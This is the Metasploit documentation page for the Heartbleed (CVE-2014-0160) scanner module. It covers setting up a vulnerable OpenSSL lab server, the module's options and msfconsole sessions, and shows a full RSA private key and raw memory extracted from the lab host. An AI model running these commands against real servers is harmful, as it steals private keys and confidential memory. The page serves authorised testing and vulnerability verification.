adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
94de45d856b7d4ea32456bbdc7531af67bfbcaa1
metasploit-gs/documentation/modules/auxiliary/scanner/ssl/openssl_heartbleed.md
T
h00die 4c6f0b1562 repeat and nmap
2019-10-16 18:00:57 -04:00

384 lines
27 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
## Vulnerable Application
The heartbleed bug was extremely well [documented](http://heartbleed.com), but essentially boils down to a client being able to specify
how much memory is retrieved from the server when performing a TLS heartbeat. This results in an arbitrary memory read, where an attacker
is able to read the contents of memory.
### Install OpenSSL 1.0.1d on Ubuntu 18.04
The following commands will download OpenSSL 1.0.1d, build and install it.
Finally, we'll use the built in `s_server` to start the service to be scanned.
`install_sw` is used to prevent an `install` [error](https://askubuntu.com/questions/454575/error-255-when-trying-to-install-openssl-1-0-1g-from-source).
```
sudo apt-get install build-essential
wget https://www.openssl.org/source/old/1.0.1/openssl-1.0.1d.tar.gz
tar -zxf openssl-1.0.1d.tar.gz && cd openssl-1.0.1d
./config
sudo make
sudo make install_sw
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
/usr/local/ssl/bin/openssl s_server -key key.pem -cert cert.pem -accept 44330 -www
```
If you receive `gethostbyname failure` error in `openssl`, add the client (metasploit)
IP and hostname to your hosts file.
## Verification Steps
1. Install a vulnerable OpenSSL, start the service
2. Start msfconsole
3. Do: ```use auxiliary/scanner/ssl/openssl_heartbleed```
4. Do: ```set rhosts [ip]```
5. Do: ```set action [ACTION]```
6. Do: ```run```
## Options
**Action**
* SCAN: Scan the host to see if it is vulnerable. If `verbose` is set to `true`, also print the memory that was dumped. This is the default.
* DUMP: Dump the memory and store it as loot.
* KEYS: Similar to DUMP but scan the results for the private key.
**TLS_CALLBACK**
Protocol to use if a specific underlying protocol is required. Default is `None`.
**TLS_VERSION**
The specific version of TLS (or SSL) to use, if only specific ones are avaialble. Defaults to `1.0` (TLS1.0).
**MAX_KEYTRIES**
If Action is set to `KEYS`, the maximum amount of times to dump memory and attempt to retrieve the private key.
Similar to `LEAK_COUNT` but only applies to `KEYS`. Default is `50`.
**STATUS_EVERY**
If Action is set to `KEYS`, how often the status should be printed. Default is `5`.
**DUMPFILTER**
A regular expresion (used in scan function) to use to filter the dump before storing. Default is `nil`.
**RESPONSE_TIMEOUT**
How long to wait for the server to respond in seconds. Default is `10`.
**LEAK_COUNT**
If Action is set to `SCAN` or `DUMP`, the maximum amount of times to dump memory.
Similar to `MAX_KEYTRIES`. Default is `1`.
## Advanced Options
**HEARTBEAT_LENGTH**
How much memory should attempt to be retrieved. Default is `65535`.
**XMPPDOMAIN**
If `jabber` is selected for `TLS_CALLBACK`, the domain to use. Default is `localhost`.
## Scenarios
### SCAN against s_server on Ubuntu 18.04 with OpenSSL 1.0.1d
With the default action of `SCAN` we can determine if the server is vulnerable or not.
```
msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 222.222.2.222
rhosts => 222.222.2.222
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rport 44330
rport => 44330
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run
[+] 222.222.2.222:44330 - Heartbeat response with leak, 65535 bytes
[*] 222.222.2.222:44330 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
### KEYS against s_server on Ubuntu 18.04 with OpenSSL 1.0.1d
In order to help elicit the keys, we can run the following code to help populate memory with
the keys:
```
watch 'cat openssl-1.0.1d/key.pem; cat openssl-1.0.1d/cert.pem'
```
```
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set action KEYS
action => KEYS
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run
[*] 222.222.2.222:44330 - Scanning for private keys
[*] 222.222.2.222:44330 - Getting public key constants...
[*] 222.222.2.222:44330 - 2019-10-13 01:32:17 UTC - Starting.
[*] 222.222.2.222:44330 - 2019-10-13 01:32:17 UTC - Attempt 0...
[+] 222.222.2.222:44330 - 2019-10-13 01:32:18 UTC - Got the private key
[*] 222.222.2.222:44330 - -----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA7ax3L0LRt5uZQTFOiJkX2xRn9ww/G87gMkMBAdeEzph7a2/i
C4stnajh9NsUbACv+dt8mtwgh0Vg4lMaI5iB9lXlqfsR17vIsW+/AZXj3Eo+B0QU
l8MpVilDvm3Hee0tE9NGLMR+Vk1Eq0UL+w7Gc/IswkFtj8XGMQ3Jc6OaJ6Ofh5hF
VlmyQBrtwvZ/20g5KtMbZFv1XX28bjEd47qfTo8nrnCsrjD7h7R42GrRw9hhvWse
sEa9VyTwQF0W8mxTYFx/7evXeJNVw1drmhJrxpGfb9gl8qzQgf6PQoi1LXaPAdk5
1cshKeGXmcA+1FR5HOdvWEqzCjMxApzdExNSgwIDAQABAoIBACmdYAT7ayL98JiU
nI6YV6/5Y7bDAy3ITEMgrkV3Sf6ufjWykl65ENShJGcuEOZUPHvALZIj5uIoiK04
JcSDyIWsRpk7p8UhUSOYUFZju1DwAupcxkpIVq2Kbh0itaGooJLvFEN0aDaOMu7W
GSHtVVwp1CJzOE7LL0eZhWNlCvHTgwwobaAUYEyrDmkOdWskMC3RGu5JrrfKTK+5
VUwMMAJ7Wf+d+xeTrNHwGGdEvHd23p1B1E3+axG0XqxI7wODz14iAWgd1zp2gSq2
Ji/II0E8Okwl3AR0d8SD0cJeEPHWlrr/6LzBUTHanDBGe2SXP/SMFSvyEpoPw/s8
vovI1okCgYEA8Ju7TuE4V2UQjZi8qcNAFnbxfcS9bk8S+BBKkgKtMY6wZT8h03fP
ouYot1IaRxMVlErrUeVtD/YKD+nhNFFYZGCSChjAhvf1rq/wzRILWpdGZ3SF9UuR
NlNpH1DcVZPOdTxCJ8DfjY72m/ugYysorQdmo9L58BhMKbfp9aHOR0cCgYEA/OCs
73xWEECKS7of0B+3CKriYT7fROu5wP9gFl3/FR8q7275TG2Iwg0rDz4NLGJhcVQ8
4bNAz+OglxqXkIVOf5Cuj8DibAw2JTr+MP5wQUaB0fPdwPcNw/fBq68x/+UpdcM2
B98b2uykN3Q2Zd2g3VVrKUOb4yJlE1EEvVrt8OUCgYEAq6oQe3jIn+Hla4D7qgs6
IE0AgwDpPliAaigFbCMoumDZjYL7eUrUA58+kXysbuU40jKZrjaIF4ktKKlvGcqn
zAXya+24/xLOYLH6lfU30Ix5mLpUEOy3UBE2wTcJ3Ky18oLpmD9NwEutuyBOEDLs
tHbBTkTqOdi8Dk+/RpcI+2UCgYEAj5qDeqiwMyCDqMd0w3sPNTPdxP2wSvJWlVww
0+LjNbpyZnAt0JIvZIuX1VsWngrsbTA6Nq3V83i/vK+UPLUHQ/gEuYv+yP8STIg4
y9fiJZ+Fn5YOa0OhJJVw/S9LhJc9uSt3Znbz2ZojE37CWYzHiom0hkVnpE/m+FY9
C880amUCgYAw8b+F3iBCEzioeUWW62c89yQaV0Ci/BQgvkhLsRRZr5hlt8+NWjSv
Nx2YT7eEcEIMOzOYF0zUH/gLo7UbZXGk/GlupqWP7kumwALz5Hu3gnx5+c69A0yL
FbawD4i1LZxrihOuuy3nt34hIlprjtW2WV49NiWnbwEzZo6ejm5NRg==
-----END RSA PRIVATE KEY-----
[*] 222.222.2.222:44330 - Private key stored in /root/.msf4/loot/20191012213218_default_222.222.2.222_openssl.heartble_250185.txt
[*] 222.222.2.222:44330 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
### DUMP against s_server on Ubuntu 18.04 with OpenSSL 1.0.1d
```
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP
action => DUMP
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run
[+] 222.222.2.222:44330 - Heartbeat response with leak, 65535 bytes
[+] 222.222.2.222:44330 - Heartbeat data stored in /root/.msf4/loot/20191012213447_default_222.222.2.222_openssl.heartble_500776.bin
[*] 222.222.2.222:44330 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > cat /root/.msf4/loot/20191012213447_default_222.222.2.222_openssl.heartble_500776.bin
[*] exec: cat /root/.msf4/loot/20191012213447_default_222.222.2.222_openssl.heartble_500776.bin
]OghE_.[MTb΋kf
"!985
32ED/A
@DA8u- b,Y'LՄձ3-bt`;ˋz4
`wVnvvx'`Y$H |k Eޞ=AGxA
afD9IWϋ3/VsD%|Z;1FF)vCny7mN1v/&YT@e3DʗOpc,yqGgz`^sMk*OuEl]%<,@SзN ""ct{ujЦ*Na\{5vRNW-4S^0be7=rJ>D)V)Cmy-F,~VMDE
s'EVY@H9*[]}n1㺟N'p0xjakFW$@]lS`\xUWko%ЁB-v9!)ᗙ>TyoXJ
31RS0Q0U]v%C#*B|c
K0U#0]v%C#*B|c
K0U00 *H
^#
怅W7Gwn*wFcR~l8C*]@g+;=|8b߬3
1ŏmA,sl1vdmi^y}52'sMG U2[N^p](*\3(icU{
EDMV~,F-ymC)V)×D>JoȻU#S`E ܚ|l᨝-
ok{΄C2
gN1AB/w!)UB/w)U#%\ rVA#_
m&r]J
;/_
rDWMZt0JbBU
|ƭ6,sd7s8$,I|'
Xj%uj}Ya'KsVc.vn:
Bcq)GLy0Ta&aZ*q/#)-ހYiR3rb)
5EX?3w`>"pΦq/}=9'PuJ]ȝ?l]cR$-mH,D^Ș{5xoS-ݴ;v]I@ÁK7H
i,ut~
߃u*nw.fU RXy^|0udhF>-ynŠ1PW
Ii/|+l)Nvc3U7Xud@oz(Lk 0R|75j^%'L;S,"5 ӕv;{q)W
zJX>j;ftDQEz/Rݜ13
1ŏmA,s)!9v-BЬ%okkWUx\`Sl]@$WFkajx0p'N1n}][d*9H@YVE's
EDMV~,F-ymC)V)×D>JoȻU#S`E ܚ|l᨝-
ok{΄C2
gN1AB/wq)U!Ɠ)U)`0)U@ɓ)U!`)U!@)U!@)UB/w15EX?3w`>"pΦq/}=9'PuJ]ȝ?l]cR$-mH,D^Ș{5xoS-ݴq)U!)U8NE<GGΡ)Lңf(+c'B<uΓUPiS6KtgFZ
`dXQ4
mQJGR(w!?e1JOn}v@éeW8Np3)U A)U @'/111oI,Щ\ͭr&1wۯH#
GeOIBu1X^vͭ|Q^vXC8'aYu!࿕)U1Y"&
AWGЊ!)U\7ڊ!p)U)U `)U\7ڊ!)U\7ڊ!p)U\7ڊ! )U0)U P)U\сFAp0:%6U\7ڊ!)U\7ڊ \7ڊ!\7ڊ )U 01)U1)UA)UA0)UAapד)U1)UZQe"C)kUݠe6t76u)1
mLn*]`D>aK@V|Õ)U<!!b{CM>
[A8%ŪY6K
XA5jXq'}cuͶW9*5g3Q a7ڊa7ڊĕ)Uĕ)UP W(E
[&(yu0.IVt1fEI̮N;]2&^} #ƂT|i2&~<Q;TBTAﴕ:/H^Wx]͓!@@c7ڊ@c7ڊPd)UPd)Ulocalhost
::1 localhost6.localdomain6 localhost6
111.111.1.111 client
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
<%NO#&+-91,qksNV^I
n
jgd0`*H yM,0
0E1
0 UAU10U
Some-State1!0U
201011031638Z0E1 Pty Ltd0
0 UAU10U
Some-State1!0U
0ernet*Hits Pty Ltd0"0
w/BѷA1Ng
?2CׄΘ{ko
-l| E`S#U׻ȱoJ>D)V)Cmy-F,~VMDE
s'EVY@H9*[]}n1㺟N'p0xjakFW$@]lS`\xUWko%ЁB-v9!)ᗙ>TyoXJ
31RS0Q0U]v%C#*B|c
K0U#0]v%C#*B|c
K0U00 *H
^#
怅W7Gwn*wFcR~l8C*]@g+;=|8b߬3
Ѓ"l1vdmi^y}52K?!MG U2[N^p](*\3(icU{
GA8u- b,Y'LՄձ3-bt`;ˋz4
`wVnvvx'`Y$H |k Eޞ=AGxA
afD9IWϋ3/VsD%|Z;1FF)vCny7mN1v/&YT@e3DʗOpc,yqGgz`^sMk*OuEn=*LX-*Na\{5vRNW-4S^0be7=r+A`d)Upt)U@qU)U0;)U1)bߜؐ0x.! 4H\A
GeOIB*H@q yM,0
0E1
0 UAU10U
Some-State1!0U
201011031638Z0E1 Pty Ltd0
0 UAU10U
Some-State1!0U
0ernet*Hits Pty Ltd0"0
w/BѷA1Ng
?2CׄΘ{ko
-l| E`S#U׻ȱoJ>D)V)Cmy-F,~VMDE
s'EVY@H9*[]}n1㺟N'p0xjakFW$@]lS`\xUWko%ЁB-v9!)ᗙ>TyoXJ
31RS0Q0U]v%C#*B|c
K0U#0]v%C#*B|c
K0U00 *H
^#
怅W7Gwn*wFcR~l8C*]@g+;=|8b߬3
Ѓ"l1vdmi^y}52qUpѓ)U D)U!]v%C#*B|c*\3(icU{
K!)U!)U!]v%C#*B|c
K!B)U'U0ؓ)U8)U0)U@)U 9)U0)U`)U)U)U)U
GeOPϓ)U U0v'UX'UX'Ub'Ub'Ub'Up'UW'Ua'q'Um'Uxt'UQ@)UAwۯH#
GeOIBu)U)U@!В)U!)U !p)U !)UÒ)U !)U 1U)UQ )UAoI,Щ\ͭr&)U@!1Y"&
AWGЊ`)U!Б)U\7ڊ! )U\7ڊ!<)U\7ڊ Ò)U\7ڊ1p)U!@)U\7ڊ`)U1@)U0QAY"&
AWGЊ@10)Uq0)U)URݜ13
1ŏmA,s)!9v-BЬ%okkWUx\`Sl]@$WFkajx0p'N1n}][d*9H@YVE's
EDMV~,F-ymC)V)×D>JoȻU#S`E ܚ|l᨝-
ok{΄C2
gN1AB/w)U,܁$zK
k졽N"AEV<)HNm[syw62]Q=Mx,f.|E=,nD9 h3F4~n
ZdZ*wc\l`Hԑ0TnzBeժ+e A#AV̗
]vMɸ=O@ʘEf!J3Cvj[t.Rc{.cyݵu&$n*!51ЊغjxfۢԐ`cdB83Hn7ȩ՜kui2B}o~/n$ JbqFBv9IMt'VuL5Z
&'TO (y
`~Ie:cdn]"g}J\plAFvKkR1:? ٭ -@_B|BSfcVES]V^Bm
@z?_@D~o]
1
VWS\J%҅]%q)U108R6kCl2!S|GjG>w8q_C9
{=on 3Eb1p|%h<a:bhj-6Z2w!pB)U@)U!f{?Py0\,s/ޫ5ơ{*{N#W",VWa#a9k?b9濞~e^MQ nwxZ%1ŏmA,s's
EDMV~,F-ymC)V)×D>JoȻU#S`E ܚ|l᨝-
ok{΄C2
gN1AB/w!)U)U#%\ rVA#_
m&r]J
;/_
rDWMZt0JbBU
|ƭ6,sd7s8$,I|'
Xj%uj}Ya'KsVc.vn:
Bcq)GLy0Ta&aZ*q/#)-ހYiR3rb)
5EX?3w`>"pΦq/}=9'PuJ]ȝ?l]cR$-mH,D^Ș{5xoS-ݴ :v)6jInldP-1ɾ
DyEl"e#Ǽ-<KN{<T&E:YDʎc#Ih5<-yұST$mU8||jS.ϖW~dj訦Dx&օUGjb'0hр.:WapX'XN7esC'ɒ$(bM܍Rݜ13
1ŏmA,s)!9v-BЬ%okkWUx\`Sl]@$WFkajx0p'N1n}][d*9H@YVE's
EDMV~,F-ymC)V)×D>JoȻU#S`E ܚ|l᨝-
ok{΄C2
gN1AB/wq)U!Ɠ)U)``)U@ɓ)U!)UB/w!@)U!@)UB/w15EX?3w`>"pΦq/}=9'PuJ]ȝ?l]cR$-mH,D^Ș{5xoS-ݴq)U!)U8NE<GGΡ)Lңf(+c'B<uΓUPiS6KtgFZ
`dXQ4
mQJGR(w!?e1JOn}v@éeW8Np3)U A)U @'/!]7ڊ!\7ڊ<)U 0)U1)U1)UAǕ)U 1\7ڊ\7ڊ0 \7ڊ!)U!9)!)U!@<)U !`;)U!0ӓ)1Q%cʹ!kaliUnR0h"!ĝjfx&~!\7ڊ!ĝjfx&~111
VWS\J%҅]%qA`'Uѓ)Uջ'UA'U)Uջ'UAP)Uד)U0)Ua1 ĕ)U`p0Lfp^=6=qnw90D}citG=xсFAp0:%6GhF(UTDw'leG`}9-ZQe"C)kUݠe6t76u)1
mLn*]`D>aK@V|q'UHn'Uv'U0v'UX'UX'Ub'Ub'Ub'Up'UW'Ua'q'Um'Uxt'U t'UxS'UpR'UPo'Uk'UXO'U`q'Um'Uu'U(u'UV'UV'U`f'f'U]'U\'Uo'U8l'UU'Ue'U['Up'U@m'Un'Uk'UM'UHM'U S'UR'UO'UR'UQ'UN'UM'UL'UA)UA@a7ڊ@a7ڊ@Ǖ)U@Ǖ)UW(E
[&(yu0.IVt1fEI̮N;]2&^} #ƂT|i2&~<Q;TBTAﴕ:/H^Wx]͓!]ObCZAgwitZy
```
The contents of `/etc/hosts` is visible in this file, as it was edited to prevent the `gethostbyname failure` issue previously noted.
### Utilizing repeat
Because arbitrary memory is dumped, a high volume application that uses openSSL will cycle potentially valuable data
fairly often. The `repeat` command can be used to execute the module multiple times.
```
msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 222.222.2.222
rhosts => 222.222.2.222
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP
action => DUMP
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > repeat -n 10 run
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
## Confirming using NMAP
Utilizing the [ssl-heartbleed](https://nmap.org/nsedoc/scripts/ssl-heartbleed.html) script, we can replicate
the `SCAN` action.
```
# nmap -p 44330 --script ssl-heartbleed 222.222.2.222
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 17:52 EDT
Nmap scan report for ubuntu1804.romain (222.222.2.222)
Host is up (0.0017s latency).
PORT STATE SERVICE
44330/tcp open unknown
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
| http://cvedetails.com/cve/2014-0160/
|_ http://www.openssl.org/news/secadv_20140407.txt
MAC Address: 00:0C:29:AA:AA:AA (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
```
Reference in New Issue View Git Blame Copy Permalink